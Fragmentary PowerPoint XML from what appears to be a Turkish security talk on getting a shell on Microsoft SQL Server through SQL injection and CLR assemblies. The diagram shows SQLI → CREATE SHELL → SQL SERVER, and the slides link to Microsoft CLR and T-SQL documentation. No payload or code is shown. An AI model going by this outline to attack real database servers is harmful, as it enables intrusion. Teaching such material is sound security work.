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2" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="277" r:id="rId2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5DD2D9-84D9-4315-AA75-B9BF8AB175E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0EE2F6E-B559-4DBC-8261-097A1F64EB86}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
            <a:t>SQLI</a:t>
          </a:r>
          <a:endParaRPr lang="tr-TR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{575512C2-905B-4B7D-AC24-2B3F74012C43}" type="parTrans" cxnId="{EB8AC64C-716E-4C90-A370-148D51A4EA5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64552D56-F53D-452E-A967-1AFC04D60D5D}" type="sibTrans" cxnId="{EB8AC64C-716E-4C90-A370-148D51A4EA5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B635E81D-94D8-4BE6-9B46-43B7AF08503B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
            <a:t>CREATE SHELL</a:t>
          </a:r>
          <a:endParaRPr lang="tr-TR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CF42D9E-6834-4764-B91F-255A21E3CA2A}" type="parTrans" cxnId="{4E5CF000-E2A3-4327-9816-37602ECD6137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F62C883-F45A-4928-AA4F-15B8DE99C164}" type="sibTrans" cxnId="{4E5CF000-E2A3-4327-9816-37602ECD6137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36F0C6E9-02DD-4DE6-AC0A-226436A182BD}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
            <a:t>SERVER SQL SERVER</a:t>
          </a:r>
          <a:endParaRPr lang="tr-TR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42482A27-0629-4131-A9E6-409602109D48}" type="parTrans" cxnId="{A44CA777-0407-42D9-9CB5-3D9F15D49E91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34A627B1-4079-4C62-AC18-07F9897CA0CD}" type="sibTrans" cxnId="{A44CA777-0407-42D9-9CB5-3D9F15D49E91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2CEF229-C3D4-464E-BE40-C9316D5EDB67}" type="pres">
      <dgm:prSet presAssocID="{D15DD2D9-84D9-4315-AA75-B9BF8AB175E7}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66E590E4-3165-404A-BEB3-DBF50FDC4E42}" type="pres">
      <dgm:prSet presAssocID="{80EE2F6E-B559-4DBC-8261-097A1F64EB8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625F971D-7C75-47D5-9A33-C644DC78B284}" type="pres">
      <dgm:prSet presAssocID="{64552D56-F53D-452E-A967-1AFC04D60D5D}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAA33F77-0DBC-4AF2-936E-804598CACD1F}" type="pres">
      <dgm:prSet presAssocID="{64552D56-F53D-452E-A967-1AFC04D60D5D}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A62545C9-24EF-445F-9C65-2B84FE450BF3}" type="pres">
      <dgm:prSet presAssocID="{B635E81D-94D8-4BE6-9B46-43B7AF08503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F8D296ED-B6BD-4D07-A7C4-01C5F1920F52}" type="pres">
      <dgm:prSet presAssocID="{2F62C883-F45A-4928-AA4F-15B8DE99C164}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{739A766B-F7BD-45C1-AC84-1AEC3EAE6BF0}" type="pres">
      <dgm:prSet presAssocID="{2F62C883-F45A-4928-AA4F-15B8DE99C164}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="tr-TR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAADE889-9A81-44A0-B91A-E727222190F3}" type="pres">
      <dgm:prSet presAssocID="{36F0C6E9-02DD-4DE6-AC0A-226436A182B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E5E0FA72-DE5C-41F0-9506-58CBFFD7F05E}" type="presOf" srcId="{2F62C883-F45A-4928-AA4F-15B8DE99C164}" destId="{F8D296ED-B6BD-4D07-A7C4-01C5F1920F52}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1D813286-709E-430C-8037-8CDE8B00600A}" type="presOf" srcId="{2F62C883-F45A-4928-AA4F-15B8DE99C164}" destId="{739A766B-F7BD-45C1-AC84-1AEC3EAE6BF0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8310A6B0-DDA9-4A3D-9899-69A2CA2C0285}" type="presOf" srcId="{80EE2F6E-B559-4DBC-8261-097A1F64EB86}" destId="{66E590E4-3165-404A-BEB3-DBF50FDC4E42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{837681D3-D52E-4DB5-A24A-76FADEC69F17}" type="presOf" srcId="{36F0C6E9-02DD-4DE6-AC0A-226436A182BD}" destId="{FAADE889-9A81-44A0-B91A-E727222190F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{745B230C-BCE7-43E0-BE47-D5946D551668}" type="presOf" srcId="{64552D56-F53D-452E-A967-1AFC04D60D5D}" destId="{FAA33F77-0DBC-4AF2-936E-804598CACD1F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A44CA777-0407-42D9-9CB5-3D9F15D49E91}" srcId="{D15DD2D9-84D9-4315-AA75-B9BF8AB175E7}" destId="{36F0C6E9-02DD-4DE6-AC0A-226436A182BD}" srcOrd="2" destOrd="0" parTransId="{42482A27-0629-4131-A9E6-409602109D48}" sibTransId="{34A627B1-4079-4C62-AC18-07F9897CA0CD}"/>
    <dgm:cxn modelId="{EB8AC64C-716E-4C90-A370-148D51A4EA5F}" srcId="{D15DD2D9-84D9-4315-AA75-B9BF8AB175E7}" destId="{80EE2F6E-B559-4DBC-8261-097A1F64EB86}" srcOrd="0" destOrd="0" parTransId="{575512C2-905B-4B7D-AC24-2B3F74012C43}" sibTransId="{64552D56-F53D-452E-A967-1AFC04D60D5D}"/>
    <dgm:cxn modelId="{9D2F3281-A20D-4492-92C1-1F7BB6F96ADA}" type="presOf" srcId="{D15DD2D9-84D9-4315-AA75-B9BF8AB175E7}" destId="{D2CEF229-C3D4-464E-BE40-C9316D5EDB67}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1E271475-F162-4EB7-A811-F935A97B3235}" type="presOf" srcId="{B635E81D-94D8-4BE6-9B46-43B7AF08503B}" destId="{A62545C9-24EF-445F-9C65-2B84FE450BF3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{308657BC-2F2E-4B47-9662-C05E3A1B594C}" type="presOf" srcId="{64552D56-F53D-452E-A967-1AFC04D60D5D}" destId="{625F971D-7C75-47D5-9A33-C644DC78B284}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{4E5CF000-E2A3-4327-9816-37602ECD6137}" srcId="{D15DD2D9-84D9-4315-AA75-B9BF8AB175E7}" destId="{B635E81D-94D8-4BE6-9B46-43B7AF08503B}" srcOrd="1" destOrd="0" parTransId="{6CF42D9E-6834-4764-B91F-255A21E3CA2A}" sibTransId="{2F62C883-F45A-4928-AA4F-15B8DE99C164}"/>
    <dgm:cxn modelId="{12DBB531-3B4C-4B37-9352-F6725D7333E8}" type="presParOf" srcId="{D2CEF229-C3D4-464E-BE40-C9316D5EDB67}" destId="{66E590E4-3165-404A-BEB3-DBF50FDC4E42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{ABB5B4AC-D968-4109-A775-A0C6C0151BB3}" type="presParOf" srcId="{D2CEF229-C3D4-464E-BE40-C9316D5EDB67}" destId="{625F971D-7C75-47D5-9A33-C644DC78B284}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{43392B87-4441-465F-A301-9D004AE8498F}" type="presParOf" srcId="{625F971D-7C75-47D5-9A33-C644DC78B284}" destId="{FAA33F77-0DBC-4AF2-936E-804598CACD1F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A26EB9B6-8FFF-4B04-91B1-4321C46B1706}" type="presParOf" srcId="{D2CEF229-C3D4-464E-BE40-C9316D5EDB67}" destId="{A62545C9-24EF-445F-9C65-2B84FE450BF3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{4582273A-4AB2-40CF-A32E-5881378637B9}" type="presParOf" srcId="{D2CEF229-C3D4-464E-BE40-C9316D5EDB67}" destId="{F8D296ED-B6BD-4D07-A7C4-01C5F1920F52}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F68A9F29-4A25-47A4-9080-74F579E9EEA6}" type="presParOf" srcId="{F8D296ED-B6BD-4D07-A7C4-01C5F1920F52}" destId="{739A766B-F7BD-45C1-AC84-1AEC3EAE6BF0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{67920738-1128-4399-A436-C247EF5AB6C9}" type="presParOf" srcId="{D2CEF229-C3D4-464E-BE40-C9316D5EDB67}" destId="{FAADE889-9A81-44A0-B91A-E727222190F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590E4-3165-404A-BEB3-DBF50FDC4E42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7143" y="117089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900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>SQLI</a:t>
          </a:r>
          <a:endParaRPr lang="tr-TR" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="44665" y="154611"/>
        <a:ext cx="2060143" cy="1206068"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{625F971D-7C75-47D5-9A33-C644DC78B284}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2355850" y="492882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2200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2355850" y="598787"/>
        <a:ext cx="316861" cy="317716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A62545C9-24EF-445F-9C65-2B84FE450BF3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2996406" y="117089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900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>CREATE SHELL</a:t>
          </a:r>
          <a:endParaRPr lang="tr-TR" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3033928" y="154611"/>
        <a:ext cx="2060143" cy="1206068"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F8D296ED-B6BD-4D07-A7C4-01C5F1920F52}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5345112" y="492882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2200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5345112" y="598787"/>
        <a:ext cx="316861" cy="317716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FAADE889-9A81-44A0-B91A-E727222190F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5985668" y="117089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900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>SERVER SQL SERVER</a:t>
          </a:r>
          <a:endParaRPr lang="tr-TR" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6023190" y="154611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F7598-F4E6-43D3-9714-B1B589622ACB}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>25.04.2020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3502F-FF04-4830-BED5-3713E8419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976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3502F-FF04-4830-BED5-3713E8419FAE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9028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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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390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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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176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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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595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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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684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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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892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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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644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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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042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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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054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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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206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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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879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CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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FEF4-0ECB-45B4-A079-1CA0DB043C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60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4CF6F-10AE-46EE-AD2C-E011CC53830C}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>24.04.2020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3FEF4-0ECB-45B4-A079-1CA0DB043C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611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s.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver15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ocs.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver15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statements/create-function-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver15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ocs.microsoft.com/en-us/sql/t-sql/statements/create-function-transact-sql?view=sql-server-ver15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ocs.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver1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statements/create-procedure-transact-sql?view=sql-server-ver1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statements/create-function-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver15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statements/create-function-transact-sql?view=sql-server-ver1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statements/create-assembly-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver1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statements/create-assembly-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver1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statements/create-assembly-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver1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sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver15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microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver15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statements/create-function-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver1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statements/create-function-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/t-sql/statements/create-procedure-transact-sql?view=sql-server-ver15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8800" b="1" dirty="0" smtClean="0"/>
              <a:t>MSSQL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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>INJECTION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>SHELL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@xb4l1c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>c: ibrahim@balicbilisim.com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7411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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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75" y="856211"/>
            <a:ext cx="7396757" cy="503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79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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c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70" y="990340"/>
            <a:ext cx="78295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34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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c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02" y="884959"/>
            <a:ext cx="78486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68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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c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68" y="998826"/>
            <a:ext cx="4381500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238" y="810318"/>
            <a:ext cx="4581118" cy="366192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904509" y="998826"/>
            <a:ext cx="2055729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68" y="1558809"/>
            <a:ext cx="6481781" cy="417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8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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="5818908"/>
            <a:ext cx="11116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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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28" y="600100"/>
            <a:ext cx="10133215" cy="515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6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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="5818908"/>
            <a:ext cx="11116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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/clr-integration-enabling?view=sql-server-ver15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18" y="1019522"/>
            <a:ext cx="111347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30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54" y="147003"/>
            <a:ext cx="9144000" cy="436471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" dirty="0"/>
              <a:t>SQL INJECTION VE SHELL / CLR</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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94423" y="6336529"/>
            <a:ext cx="1158240" cy="395196"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>@xb4l1c</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249381" y="5818908"/>
            <a:ext cx="1111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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>docs.microsoft.com/en-us/sql/t-sql/statements/create-function-transact-sql?view=sql-server-ver15</a:t>
            </a:r>
            <a:endParaRPr lang="tr-T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26" y="917255"/>
            <a:ext cx="6973849" cy="4567871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545215" y="1453394"/>
            <a:ext cx="2126518" cy="268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836" y="1239207"/>
            <a:ext cx="4904182" cy="19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62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54" y="147003"/>
